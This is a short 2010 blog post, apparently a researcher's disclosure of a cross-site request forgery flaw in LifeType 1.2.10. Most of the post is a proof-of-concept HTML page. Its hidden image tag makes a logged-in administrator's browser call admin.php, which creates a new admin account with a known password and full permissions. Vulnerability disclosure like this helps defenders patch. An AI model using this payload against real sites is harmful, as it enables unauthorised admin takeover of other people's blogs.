This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

LifeType 1.2.10 Cross-site Request Forgery

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
</body>
</html>

3 comments: